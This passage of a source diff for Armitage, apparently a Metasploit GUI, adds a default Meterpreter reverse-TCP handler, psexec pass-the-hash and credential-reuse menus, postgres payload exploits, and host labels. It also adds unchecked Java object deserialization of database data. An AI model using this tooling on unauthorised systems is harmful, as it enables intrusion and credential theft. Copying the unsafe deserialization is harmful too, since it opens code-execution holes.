 	# setup second thread.
         %r = call($client, "armitage.validate", $user, $pass, $null, "armitage", 120326);
 
+	# resolve lhost..
+	$c = call($client, "console.allocate")['id'];
+	call($client, "console.write", $c, "setg LHOST\n");
+	while ($lhost eq "") {
+		$temp = call($client, "console.read", $c)['data'];
+		if (["$temp" startsWith: "LHOST => "]) {
+			$lhost = substr(["$temp" trim], 9);
+		}
+		else {
+			# this shouldn't happen because having LHOST set is a precondition
+			# for Cortana to connect to a team server.
+			sleep(1000);
+		}
+	}
+	call($client, "console.release", $c);
+
 	# pass some objects back yo.
-	[$loader passObjects: $client, $mclient];
+	[$loader passObjects: $client, $mclient, $lhost];
 
 	# don't make previous messages available...
 	call($mclient, "armitage.skip");

external/source/armitage/scripts-cortana/internal.sl

@@ -9,7 +9,7 @@ import msf.*;
 
 # setg("varname", "value")
 sub setg {
-	call_async("core.setg", $1, $2);
+	cmd_safe("setg $1 $2");
 }
 
 sub readg {
@@ -243,14 +243,18 @@ sub session_exploit {
 # credentials API
 #
 
+sub _fix_pass {
+	return replace(strrep($1, '\\', '\\\\'), '(\p{Punct})', '\\\\$1');
+}
+
 # credential_add("host", "port", "user, "pass", "type")
 sub credential_add {
-	cmd_safe("creds -a $1 -p $2 -t $5 -u $3 -P $4");
+	cmd_safe("creds -a $1 -p $2 -t $5 -u $3 -P " . _fix_pass($4));
 }
 
 # credential_delete("host", port, "user", "pass");
 sub credential_delete {
-	cmd_safe("creds -a $1 -p $2 -u $3 -P $4 -d");
+	cmd_safe("creds -a $1 -p $2 -u $3 -P " . _fix_pass($4) . " -d");
 }
 
 sub credential_list {
@@ -331,14 +335,22 @@ sub multi_handler {
 }
 
 sub handler {
-	local('%o $3');
+	local('%o $3 $key $value');
+
+	# default options
+	%o['PAYLOAD'] = $1;
+	%o['LPORT']   = $2;
+	%o['DisablePayloadHandler'] = 'false';
+	%o['ExitOnSession']         = 'false';
+
+	# let the user override anything
 	if ($3) {
-		%o = copy($3);
+		foreach $key => $value ($3) {
+			%o[$key] = $value;
+		}
 	}
 
-	%o['PAYLOAD'] = "payload/ $+ $1";
-	%o['LPORT']   = $2;
-
+	# make sure LHOST is correct
 	if ('LHOST' !in %o) {
 		if ("*http*" iswm $1) {
 			%o['LHOST']   = lhost();
@@ -348,6 +360,7 @@ sub handler {
 		}
 	}
 
+	# let's do it...
 	return launch('exploit', 'multi/handler', %o);
 }
 

external/source/armitage/scripts/armitage.sl

@@ -59,6 +59,9 @@ sub showHost {
 		else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) {
 			push(@overlay, 'resources/windowsxp.png');
 		}
+		else if ("*8*" iswm $match && "*2008*" !iswm $match) {
+			push(@overlay, 'resources/windows8.png');
+		}
 		else {
 			push(@overlay, 'resources/windows7.png');
 		}
@@ -136,7 +139,7 @@ sub _connectToMetasploit {
 	$progress = [new ProgressMonitor: $null, "Connecting to $1 $+ : $+ $2", "first try... wish me luck.", 0, 100];
 
 	# keep track of whether we're connected to a local or remote Metasploit instance. This will affect what we expose.
-	$REMOTE = iff($1 eq "127.0.0.1", $null, 1);
+	$REMOTE = iff($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost", $null, 1);
 
 	$flag = 10;
 	while ($flag) {
@@ -157,7 +160,7 @@ sub _connectToMetasploit {
 			}
 
 			# connecting locally? go to Metasploit directly...
-			if ($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost") {
+			if ($REMOTE is $null) {
 				$client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug];
 				$aclient = [new RpcAsync: $client];
 				$mclient = $client;
@@ -236,10 +239,6 @@ sub _connectToMetasploit {
 		[$progress setNote: "Connected: ..."];
 		[$progress setProgress: 60];
 
-		if (!$REMOTE && %MSF_GLOBAL['ARMITAGE_TEAM'] eq '1') {
-			showErrorAndQuit("Do not connect to 127.0.0.1 when\nrunning a team server.");
-		}
-
 		dispatchEvent(&postSetup);
 	}, \$progress));
 }

external/source/armitage/scripts/attacks.sl

@@ -22,7 +22,7 @@ setMissPolicy(%results2, { return @(); });
 # %exploits is populated in menus.sl when the client-side attacks menu is constructed
 
 # a list of exploits that should always use a reverse shell... this list needs to grow.
-@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php");
+@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php", "windows/postgres/postgres_payload", "linux/postgres/postgres_payload");
 
 #
 # generate menus for a given OS
@@ -599,26 +599,28 @@ sub host_attack_items {
 		}
 	}
 
-	local('$service $name @options $a $port $foo');
+	local('$name %options $a $port $host $service');
+	%options = ohash();
 
-	foreach $port => $service (%hosts[$2[0]]['services']) {
-		$name = $service['name'];
-		if ($port == 445 && "*Windows*" iswm getHostOS($2[0])) {
-			push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2)));
-		}
-		else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) {
-			push(@options, @($name, lambda(&show_login_dialog, \$service, $hosts => $2)));
-		}
-		else if ($name eq "microsoft-ds") {
-			push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2)));
+	foreach $host ($2) {
+		foreach $port => $service (%hosts[$host]['services']) {
+			$name = $service['name'];
+			if ($port == 445 && "*Windows*" iswm getHostOS($host)) {
+				%options["psexec"] = lambda(&pass_the_hash, $hosts => $2);
+			}
+			else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) {
+				%options[$name] = lambda(&show_login_dialog, \$service, $hosts => $2);
+			}
+			else if ($name eq "microsoft-ds") {
+				%options["psexec"] = lambda(&pass_the_hash, $hosts => $2);
+			}
 		}
 	}
 
-	if (size(@options) > 0) {
+	if (size(%options) > 0) {
 		$a = menu($1, 'Login', 'L');
-		foreach $service (@options) {
-			($name, $foo) = $service;
-			item($a, $name, $null, $foo);
+		foreach $name (sorta(keys(%options))) {
+			item($a, $name, $null, %options[$name]);
 		}
 	}
 }
@@ -677,11 +679,20 @@ sub addFileListener {
 	$actions["SigningCert"] = $actions["*FILE*"];
 	$actions["SigningKey"] = $actions["*FILE*"];
 	$actions["Wordlist"]   = $actions["*FILE*"];
+	$actions["EXE::Custom"] = $actions["*FILE*"];
+	$actions["EXE::Template"] = $actions["*FILE*"];
 	$actions["WORDLIST"]   = $actions["*FILE*"];
+	$actions["REXE"]   = $actions["*FILE*"];
 
 	# set up an action to choose a session
 	$actions["SESSION"] = lambda(&chooseSession);
 
+	# helpers to set credential pairs from database... yay?
+	$actions["USERNAME"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD");
+	$actions["PASSWORD"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD");
+	$actions["SMBUser"] = lambda(&credentialHelper, \$model,  $USER => "SMBUser", $PASS => "SMBPass");
+	$actions["SMBPass"] = lambda(&credentialHelper, \$model,  $USER => "SMBUser", $PASS => "SMBPass");
+
 	# set up an action to pop up a file chooser for different file type values.
 	$actions["RHOST"] = {
 		local('$title $temp');

external/source/armitage/scripts/gui.sl

@@ -446,7 +446,7 @@ sub quickListDialog {
 	
 	$button = [new JButton: $2];
 	[$button addActionListener: lambda({
-		[$callback : [$model getSelectedValueFromColumn: $table, $lead]]; 
+		[$callback : [$model getSelectedValueFromColumn: $table, $lead], $table, $model]; 
 		[$dialog setVisible: 0];
 	}, \$dialog, $callback => $5, \$model, \$table, $lead => $3[0])];
 

external/source/armitage/scripts/jobs.sl

@@ -16,47 +16,7 @@ import java.awt.event.*;
 import ui.*;
 
 sub manage_proxy_server {
-	manage_job("Auxiliary: server/socks4a", 
-		# start server function
-		{
-			launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", $null);
-		},
-		# description of job (for job kill function)
-		{
-			local('$host $port');
-			($host, $port) = values($2["datastore"], @("SRVHOST", "SRVPORT"));
-			return "SOCKS proxy is running on $host $+ : $+ $port $+ .\nWould you like to stop it?";
-		}
-	);
-
-}
-
-sub report_url {
-	find_job($name, {
-		if ($1 == -1) {
-			showError("Server not found");
-		}
-		else {
-			local('$job $host $port $uripath');
-			$job = call($client, "job.info", $1);
-
-			($host, $port) = values($job["info"]["datastore"], @("SRVHOST", "SRVPORT"));
-			$uripath = $job["info"]["uripath"];
-
-			local('$dialog $text $ok');
-			$dialog = dialog("Output", 320, 240);
-			$text = [new JTextArea];
-			[$text setText: "http:// $+ $host $+ : $+ $port $+ $uripath"];
-
-			$button = [new JButton: "Ok"];
- 			[$button addActionListener: lambda({ [$dialog setVisible: 0]; }, \$dialog)];
-
-			[$dialog add: [new JScrollPane: $text], [BorderLayout CENTER]];
-			[$dialog add: center($button), [BorderLayout SOUTH]];
-
-			[$dialog setVisible: 1];
-		}
-	});
+	launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", 1);
 }
 
 sub find_job {
@@ -80,26 +40,6 @@ sub find_job {
 	}, $name => $1, $function => $2));
 }
 
-# manage_job(job name, { start job function }, { job dialog info })
-sub manage_job {
-	local('$name $startf $stopf');
-	($name, $startf, $stopf) = @_;
-
-	find_job($name, lambda({
-		if ($1 == -1) {
-			[$startf];
-		}
-		else {
-			local('$job $confirm $foo $confirm');
-			$job = call($client, "job.info", $1);
-			$confirm = askYesNo([$stopf : $1, $job], "Stop Job");
-			if ($confirm eq "0") {
-				call_async($client, "job.stop", $1);
-			}
-		}		
-	}, \$startf, \$stopf));
-}
-
 sub generatePayload {
 	local('$file');
 	$file = saveFile2();
@@ -450,6 +390,11 @@ sub _launch_dialog {
 						elog("launched DNS enum for $domain");
 					}
 				}
+				else if ($type eq "auxiliary" && $command eq "server/socks4a") {
+					local('$host $port');
+					($host, $port) = values($options, @('SRVHOST', 'SRVPORT'));
+					elog("started SOCKS proxy server at $host $+ : $+ $port");
+				}
 
 				launch_service($title, "$type $+ / $+ $command", $options, $type, $format => [$combo getSelectedItem]);
 			}

external/source/armitage/scripts/menus.sl

@@ -52,6 +52,30 @@ sub host_selected_items {
 			item($i, '1. 95/98/2000', '1', setHostValueFunction($2, "os_name", "Micosoft Windows", "os_flavor", "2000"));
 			item($i, '2. XP/2003', '2', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "XP"));
 			item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista"));
+			item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8"));
+
+		item($h, "Set Label...", 'S', lambda({
+			# calculate preexisting label to prompt with
+			local('$label %l $host');
+
+			# get a label
+			foreach $host ($hosts) {
+				if ($label eq "") {
+					$label = getHostLabel($host);
+				}
+			}
+
+			# ask for a label 
+			$label = ask("Set label to:", $label);
+			if ($label !is $null) {
+				foreach $host ($hosts) {
+					%l[$host] = ["$label" trim];
+				}
+				call_async($mclient, "db.report_labels", %l);
+			}
+		}, $hosts => $2));
+
+		separator($h);
 
 		item($h, "Remove Host", 'R', clearHostFunction($2));
 }

external/source/armitage/scripts/passhash.sl

@@ -41,6 +41,7 @@ import ui.*;
 
 		# strip any funky characters that will cause this call to throw an exception
 		$user = replace($user, '\P{Graph}', "");
+		$hash = fixPass($hash);
 
 		[$queue addCommand: $null, "creds -a $host -p 445 -t smb_hash -u $user -P $hash"];
 	}
@@ -106,6 +107,7 @@ sub createCredentialsTab {
 				$queue = [new armitage.ConsoleQueue: $client];
 				foreach $entry ($entries) {
 					($user, $pass, $host) = $entry;
+					$pass = fixPass($pass);
 					[$queue addCommand: $null, "creds -d $host -u $user -P $pass"];
 				}
 
@@ -370,3 +372,34 @@ sub launchBruteForce {
 		[$console start];
 	}, $type => $1, $module => $2, $options => $3, $title => $4));
 }
+
+sub credentialHelper {
+	thread(lambda({ 
+		[Thread yield];
+
+		# gather our credentials please
+		local('$creds $cred @creds');
+		$creds = call($mclient, "db.creds2", [new HashMap])["creds2"];
+		foreach $cred ($creds) {
+			if ($PASS eq "SMBPass" || $cred['ptype'] ne "smb_hash") {
+				push(@creds, $cred);
+			}
+		}
+
+		# pop up a dialog to let the user choose their favorite set
+		quickListDialog("Choose credentials", "Select", @("user", "user", "pass", "host"), @creds, $width => 640, $height => 240, lambda({
+			if ($1 eq "") {
+				return;
+			}
+
+			local('$user $pass');
+			$user = [$3 getSelectedValueFromColumn: $2, 'user'];
+			$pass = [$3 getSelectedValueFromColumn: $2, 'pass'];
+
+			[$model setValueForKey: $USER, "Value", $user];
+			[$model setValueForKey: $PASS, "Value", $pass];
+			[$model fireListeners];
+		}, \$callback, \$model, \$USER, \$PASS));
+	}, \$USER, \$PASS, \$model, $callback => $4));
+}
+

external/source/armitage/scripts/preferences.sl

@@ -114,7 +114,12 @@ sub loadPreferences {
 
 sub loadDatabasePreferences {
 	if ($yaml_file eq "" || !-exists $yaml_file) {
-		$yaml_file = getFileProper($BASE_DIRECTORY, "config", "database.yml");
+		if (thisIsTheirCommercialStuff()) {
+			$yaml_file = getFileProper($BASE_DIRECTORY, "ui", "config", "database.yml");
+		}
+		else {
+			$yaml_file = getFileProper($BASE_DIRECTORY, "config", "database.yml");
+		}
 	}
 
 	if (!-exists $yaml_file) {
@@ -340,6 +345,7 @@ sub createPreferencesTab {
 sub setupBaseDirectory {
 	local('%o');
 	%o = call($client, "module.options", "post", "multi/gather/dns_bruteforce");
+
 	if ("NAMELIST" in %o && "default" in %o["NAMELIST"]) {
 		$BASE_DIRECTORY = getFileParent(getFileParent(getFileParent(getFileParent(%o["NAMELIST"]["default"]))));
 		$DATA_DIRECTORY = getFileParent(getFileParent(%o["NAMELIST"]["default"]));
@@ -385,3 +391,8 @@ sub dataDirectory {
 
 	return $f;
 }
+
+sub thisIsTheirCommercialStuff {
+	# check if we're living in a Metasploit 4.5+ installer environment.
+	return iff("*app*pro*" iswm $BASE_DIRECTORY);
+}

external/source/armitage/scripts/server.sl

@@ -403,9 +403,6 @@ sub main {
 	# we need this global to be set so our reverse listeners work as expected.
 	$MY_ADDRESS = $host;
 
-	# make sure clients know a team server is present. can't happen async.
-	call($client, "core.setg", "ARMITAGE_TEAM", '1');
-
 	#
 	# setup the client cache
 	#

external/source/armitage/scripts/targets.sl

@@ -21,6 +21,10 @@ sub getHostOS {
 	return iff($1 in %hosts, %hosts[$1]['os_name'], $null);
 }
 
+sub getHostLabel {
+	return iff($1 in %hosts, %hosts[$1]['label'], $null);
+}
+
 sub getSessions {
 	return iff($1 in %hosts && 'sessions' in %hosts[$1], %hosts[$1]['sessions']);
 }
@@ -122,7 +126,7 @@ on sessions {
 		}
 
 		if ($host['show'] eq "1") {
-			push(@nodes, @($id, describeHost($host), showHost($host), $tooltip));
+			push(@nodes, @($id, $host['label'] . "", describeHost($host), showHost($host), $tooltip));
 		}
 	}
 
@@ -130,14 +134,14 @@ on sessions {
 }
 
 sub refreshGraph {
-	local('$node $id $description $icons $tooltip $highlight');
+	local('$node $id $label $description $icons $tooltip $highlight');
 
 	# update everything...
 	[$graph start];
 		# do the hosts?
 		foreach $node (@nodes) {
-			($id, $description, $icons, $tooltip) = $node;
-			[$graph addNode: $id, $description, $icons, $tooltip];
+			($id, $label, $description, $icons, $tooltip) = $node;
+			[$graph addNode: $id, $label, $description, $icons, $tooltip];
 		}
 
 		# update the routes

external/source/armitage/scripts/util.sl

@@ -159,12 +159,15 @@ sub setg {
 }
 
 sub createDefaultHandler {
-	warn("Creating a default reverse handler...");
 	# setup a handler for meterpreter
-	setg("LPORT", randomPort());
+	local('$port');
+	$port = randomPort();
+	setg("LPORT", $port);
+	warn("Creating a default reverse handler... 0.0.0.0: $+ $port");
 	call_async($client, "module.execute", "exploit", "multi/handler", %(
 		PAYLOAD => "windows/meterpreter/reverse_tcp",
 		LHOST => "0.0.0.0",
+		LPORT => $port,
 		ExitOnSession => "false"
 	));
 }
@@ -294,6 +297,11 @@ sub startMetasploit {
 					[System exit: 0];
 				}
 
+				# if the user chooses c:\metasploit AND we're in the 4.5 environment... adjust
+				if (-exists getFileProper($msfdir, "apps", "pro", "msf3")) {
+					$msfdir = getFileProper($msfdir, "apps", "pro");
+				}
+
 				if (charAt($msfdir, -1) ne "\\") {
 					$msfdir = "$msfdir $+ \\";
 				}
@@ -302,7 +310,12 @@ sub startMetasploit {
 				savePreferences();
 			}
 
-			$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null];
+			if ("*apps*pro*" iswm $msfdir) {
+				$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd_new.bat"), $null];
+			}
+			else {
+				$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null];
+			}
 			$data = join("\r\n", readAll($handle, -1));
 			closef($handle);
 
@@ -411,7 +424,7 @@ sub connectDialog {
 		[$dialog setVisible: 0];
 		connectToMetasploit($h, $p, $u, $s);
 
-		if ($h eq "127.0.0.1" || $h eq "localhost") {
+		if ($h eq "127.0.0.1" || $h eq "::1" || $h eq "localhost") {
 			try {
 				closef(connect("127.0.0.1", $p, 1000));
 			}
@@ -472,6 +485,15 @@ sub _module_execute {
 			$host = "all";
 		}
 
+		# fix SMBPass and PASSWORD options if necessary...
+		if ("PASSWORD" in $3) {
+			$3['PASSWORD'] = fixPass($3['PASSWORD']);
+		}
+
+		if ("SMBPass" in $3) {
+			$3['SMBPass'] = fixPass($3['SMBPass']);
+		}
+
 		# okie then, let's create a console and execute all of this stuff...	
 
 		local('$queue $key $value');
@@ -607,3 +629,8 @@ sub initConsolePool {
 	[$client addHook: "console.release", $pool];
 	[$client addHook: "console.release_and_destroy", $pool];
 }
+
+sub fixPass {
+	return replace(strrep($1, '\\', '\\\\'), '(\p{Punct})', '\\\\$1');
+}
+

external/source/armitage/scripts/workspaces.sl

@@ -33,7 +33,7 @@ sub listWorkspaces {
 	$dialog = [new JPanel];
 	[$dialog setLayout: [new BorderLayout]];
 
-	($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "session"), @());
+	($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "labels", "session"), @());
 	updateWorkspaceList($table, $model);
 	[$table setSelectionMode: [ListSelectionModel MULTIPLE_INTERVAL_SELECTION]];
 	
@@ -88,15 +88,16 @@ sub workspaceDialog {
 	local('$table $model');
 	($table, $model) = $2;
 
-	local('$dialog $name $host $ports $os $button $session');
+	local('$dialog $name $host $ports $os $button $session $label');
 	$dialog = dialog($title, 640, 480);
-	[$dialog setLayout: [new GridLayout: 6, 1]];
+	[$dialog setLayout: [new GridLayout: 7, 1]];
 
 	$name  = [new ATextField: $1['name'], 16];
 	[$name setEnabled: $enable];
 	$host  = [new ATextField: $1['hosts'], 16];
 	$ports = [new ATextField: $1['ports'], 16];
 	$os    = [new ATextField: $1['os'], 16];
+	$label = [new ATextField: $1['labels'], 16];
 	$session = [new JCheckBox: "Hosts with sessions only"];
 	if ($1['session'] eq 1) {
 		[$session setSelected: 1];
@@ -108,6 +109,7 @@ sub workspaceDialog {
 	[$dialog add: label_for("Hosts:", 60, $host)]; 
 	[$dialog add: label_for("Ports:", 60, $ports)]; 
 	[$dialog add: label_for("OS:", 60, $os)]; 
+	[$dialog add: label_for("Labels:", 60, $label)];
 	[$dialog add: $session];
 
 	[$dialog add: center($button)];
@@ -116,15 +118,16 @@ sub workspaceDialog {
 
 	[$button addActionListener: lambda({
 		# yay, we have a dialog...
-		local('$n $h $p $o $s @workspaces $ws $temp');
+		local('$n $h $p $o $s $l @workspaces $ws $temp');
 		$n = [[$name getText] trim];
 		$h = [strrep([$host getText], '*', '%', '?', '_') trim];
 		$p = [[$ports getText] trim];
 		$o = [strrep([$os getText], '*', '%', '?', '_') trim];
+		$l = [[$label getText] trim];
 		$s = [$session isSelected];
 
 		# save the new menu
-		$ws = workspace($n, $h, $p, $o, $s);
+		$ws = workspace($n, $h, $p, $o, $s, $l);
 		@workspaces = workspaces();
 		foreach $temp (@workspaces) {
 			if ($temp["name"] eq $n) {
@@ -140,7 +143,7 @@ sub workspaceDialog {
 		updateWorkspaceList($table, $model);
 
 		[$dialog setVisible: 0];
-	}, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model)];
+	}, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model, \$label)];
 }
 
 sub reset_workspace {
@@ -199,16 +202,16 @@ sub set_workspace {
 }
 
 sub workspace {
-	return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5);
+	return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5, labels => $6);
 }
 
 sub workspaces {
-	local('$ws @r $name $host $port $os $session $workspace');
+	local('$ws @r $name $host $port $os $session $workspace $label');
 	$ws = split("!!", [$preferences getProperty: "armitage.workspaces.menus", ""]);
 	foreach $workspace ($ws) {
 		if ($workspace ne "") {
-			($name, $host, $port, $os, $session) = split('@@', $workspace);
-			push(@r, workspace($name, $host, $port, $os, $session));
+			($name, $host, $port, $os, $session, $label) = split('@@', $workspace);
+			push(@r, workspace($name, $host, $port, $os, $session, $label));
 		}
 	}
 	return @r;

external/source/armitage/src/armitage/ArmitageApplication.java

@@ -196,6 +196,7 @@ public class ArmitageApplication extends JFrame {
 				r.setLayout(new BorderLayout());
 				r.add(t.component, BorderLayout.CENTER);
 				r.pack();
+				t.component.validate();
 
 				r.addWindowListener(new WindowAdapter() {
 					public void windowClosing(WindowEvent ev) {

external/source/armitage/src/cortana/Cortana.java

@@ -428,13 +428,6 @@ public class Cortana implements Loadable, RuntimeWarningWatcher {
 
 			/* start the timer thread */
 			new cortana.support.Heartbeat(events).start();
-
-			/* regularly communicate with Metasploit or else our connection will drop */
-			new ArmitageTimer(client, "core.version", 200 * 1000L, new ArmitageTimerClient() {
-				public boolean result(String command, Object[] arguments, Map results) {
-					return true;
-				}
-			}, false);
 		}
 		started = true;
 	}

external/source/armitage/src/cortana/Loader.java

@@ -15,7 +15,7 @@ public class Loader implements Loadable {
 	protected ScriptLoader    loader;
 	protected Hashtable       shared  = new Hashtable();
 	protected ScriptVariables vars    = new ScriptVariables();
-	protected Object[]        passMe  = new Object[2];
+	protected Object[]        passMe  = new Object[3];
 	protected List		  scripts = new LinkedList();
 
 	public void unsetDebugLevel(int flag) {
@@ -51,10 +51,11 @@ public class Loader implements Loadable {
 		}
 	}
 
-	public void passObjects(Object o, Object p) {
+	public void passObjects(Object o, Object p, Object q) {
 		synchronized (this) {
 			passMe[0] = o;
 			passMe[1] = p;
+			passMe[2] = q;
 		}
 	}
 

external/source/armitage/src/cortana/Main.java

@@ -69,7 +69,7 @@ public class Main implements Runnable, CortanaPipe.CortanaPipeListener {
 		try {
 			Object conns[] = setupConnections(host, port, user, pass, nick);
 			//new MsgRpcImpl(user, pass, host, Integer.parseInt(port), true, false);
-			engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, host);
+			engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, (String)conns[2]);
 			new Thread(this).start();
 		}
 		catch (java.lang.RuntimeException rex) {

external/source/armitage/src/graph/NetworkGraph.java

@@ -453,17 +453,26 @@ public class NetworkGraph extends JComponent implements ActionListener {
 
 	protected Map tooltips = new HashMap();
 
-	public Object addNode(String id, String label, Image image, String tooltip) {
+	public Object addNode(String id, String label, String description, Image image, String tooltip) {
 		nodeImages.put(id, image);
 
+		if (label.length() > 0) {
+			if (description.length() > 0) {
+				description += "\n" + label;
+			}
+			else {
+				description = label;
+			}
+		}
+
 		mxCell cell;
 		if (!nodes.containsKey(id)) {
-			cell = (mxCell)graph.insertVertex(parent, id, label, 0, 0, 125, 97);
+			cell = (mxCell)graph.insertVertex(parent, id, description, 0, 0, 125, 97);
 			nodes.put(id, cell);
 		}
 		else {
 			cell = (mxCell)nodes.get(id);
-			cell.setValue(label);
+			cell.setValue(description);
 		}
 		nodes.touch(id);
 

external/source/armitage/src/msf/DatabaseImpl.java

@@ -14,11 +14,15 @@ public class DatabaseImpl implements RpcConnection  {
 	protected String workspaceid = "0";
 	protected String hFilter = null;
 	protected String sFilter = null;
+	protected String[] lFilter = null;
 	protected Route[]  rFilter = null;
 	protected String[] oFilter = null;
 	protected int hindex = 0;
 	protected int sindex = 0;
 
+	/* keep track of labels associated with each host */
+	protected Map labels = new HashMap();
+
 	/* define the maximum hosts in a workspace */
 	protected int maxhosts = 512;
 
@@ -135,6 +139,20 @@ public class DatabaseImpl implements RpcConnection  {
 		return false;
 	}
 
+	private boolean checkLabel(String host) {
+		if (!labels.containsKey(host))
+			return false;
+
+		String label_l = (labels.get(host) + "").toLowerCase();
+
+		for (int x = 0; x < lFilter.length; x++) {
+			if (label_l.indexOf(lFilter[x]) != -1) {
+				return true;
+			}
+		}
+		return false;
+	}
+
 	private boolean checkOS(String os) {
 		String os_l = os.toLowerCase();
 
@@ -145,11 +163,76 @@ public class DatabaseImpl implements RpcConnection  {
 		return false;
 	}
 
+	protected void loadLabels() {
+		try {
+			/* query database for label data */
+			List rows = executeQuery("SELECT DISTINCT data FROM notes WHERE ntype = 'armitage.labels'");
+			if (rows.size() == 0)
+				return;
+
+			/* extract our BASE64 encoded data */
+			String data = ((Map)rows.get(0)).get("data") + "";
+			System.err.println("Read: " + data.length() + " bytes");
+
+			/* turn our data into raw data */
+			byte[] raw  = Base64.decode(data);
+
+			/* deserialize our notes data */
+			ByteArrayInputStream store = new ByteArrayInputStream(raw);
+			ObjectInputStream handle = new ObjectInputStream(store);
+			Map temp = (Map)(handle.readObject());
+			handle.close();
+			store.close();
+
+			/* merge with our new map */
+			labels.putAll(temp);
+		}
+		catch (Exception ex) {
+			ex.printStackTrace();
+		}
+	}
+
+	protected void mergeLabels(Map l) {
+		/* accept any label values and merge them into our global data set */
+		Iterator i = l.entrySet().iterator();
+		while (i.hasNext()) {
+			Map.Entry entry = (Map.Entry)i.next();
+			if ("".equals(entry.getValue())) {
+				labels.remove(entry.getKey() + "");
+			}
+			else {
+				labels.put(entry.getKey() + "", entry.getValue() + "");
+			}
+		}
+	}
+
+	/* add labels to our hosts */
+	public List addLabels(List rows) {
+		if (labels.size() == 0)
+			return rows;
+
+		Iterator i = rows.iterator();
+		while (i.hasNext()) {
+			Map entry = (Map)i.next();
+			String address = (entry.containsKey("address") ? entry.get("address") : entry.get("host")) + "";
+			if (labels.containsKey(address)) {
+				entry.put("label", labels.get(address) + "");
+			}
+			else {
+				entry.put("label", "");
+			}
+		}
+
+		return rows;
+	}
+
 	public List filterByRoute(List rows, int max) {
-		if (rFilter != null || oFilter != null) {
+		if (rFilter != null || oFilter != null || lFilter != null) {
 			Iterator i = rows.iterator();
 			while (i.hasNext()) {
 				Map entry = (Map)i.next();
+
+				/* make sure the address is within a route we care about */
 				if (rFilter != null && entry.containsKey("address")) {
 					if (!checkRoute(entry.get("address") + "")) {
 						i.remove();
@@ -163,9 +246,26 @@ public class DatabaseImpl implements RpcConnection  {
 					}
 				}
 
+				/* make sure the host is something we care about too */
 				if (oFilter != null && entry.containsKey("os_name")) {
-					if (!checkOS(entry.get("os_name") + ""))
+					if (!checkOS(entry.get("os_name") + "")) {
 						i.remove();
+						continue;
+					}
+				}
+
+				/* make sure the host has the right label */
+				if (lFilter != null && entry.containsKey("address")) {
+					if (!checkLabel(entry.get("address") + "")) {
+						i.remove();
+						continue;
+					}
+				}
+				else if (lFilter != null && entry.containsKey("host")) {
+					if (!checkLabel(entry.get("host") + "")) {
+						i.remove();
+						continue;
+					}
 				}
 			}
 
@@ -180,6 +280,7 @@ public class DatabaseImpl implements RpcConnection  {
 	public void connect(String dbstring, String user, String password) throws Exception {
 		db = DriverManager.getConnection(dbstring, user, password);
 		setWorkspace("default");
+		loadLabels();
 	}
 
 	public Object execute(String methodName) throws IOException {
@@ -192,8 +293,8 @@ public class DatabaseImpl implements RpcConnection  {
 		/* this is an optimization. If we have a network or OS filter, we need to pull back all host/service records and
 		   filter them here. If we do not have these types of filters, then we can let the database do the heavy lifting
 		   and limit the size of the final result there. */
-		int limit1 = rFilter == null && oFilter == null ? maxhosts : 30000;
-		int limit2 = rFilter == null && oFilter == null ? maxservices : 100000;
+		int limit1 = rFilter == null && oFilter == null && lFilter == null ? maxhosts : 30000;
+		int limit2 = rFilter == null && oFilter == null && lFilter == null ? maxservices : 100000;
 
 		temp.put("db.creds", "SELECT DISTINCT creds.*, hosts.address as host, services.name as sname, services.port as port, services.proto as proto FROM creds, services, hosts WHERE services.id = creds.service_id AND hosts.id = services.host_id AND hosts.workspace_id = " + workspaceid);
 
@@ -235,7 +336,7 @@ public class DatabaseImpl implements RpcConnection  {
 					result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxservices));
 				}
 				else if (methodName.equals("db.hosts")) {
-					result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxhosts));
+					result.put(methodName.substring(3), addLabels(filterByRoute(executeQuery(query), maxhosts)));
 				}
 				else {
 					result.put(methodName.substring(3), executeQuery(query));
@@ -332,6 +433,7 @@ public class DatabaseImpl implements RpcConnection  {
 
 				rFilter = null;
 				oFilter = null;
+				lFilter = null;
 
 				List hosts = new LinkedList();
 				List srvcs = new LinkedList();
@@ -385,6 +487,11 @@ public class DatabaseImpl implements RpcConnection  {
 					oFilter = (values.get("os") + "").toLowerCase().split(",\\s*");
 				}
 
+				/* label filter */
+				if (values.containsKey("labels") && (values.get("labels") + "").length() > 0) {
+					lFilter = (values.get("labels") + "").toLowerCase().split(",\\s*");
+				}
+
 				if (hosts.size() == 0) {
 					hFilter = null;
 				}
@@ -406,6 +513,31 @@ public class DatabaseImpl implements RpcConnection  {
 				result.put("rows", new Integer(stmt.executeUpdate()));
 				return result;
 			}
+			else if (methodName.equals("db.report_labels")) {
+				/* merge out global label data */
+				Map values = (Map)params[0];
+				mergeLabels(values);
+
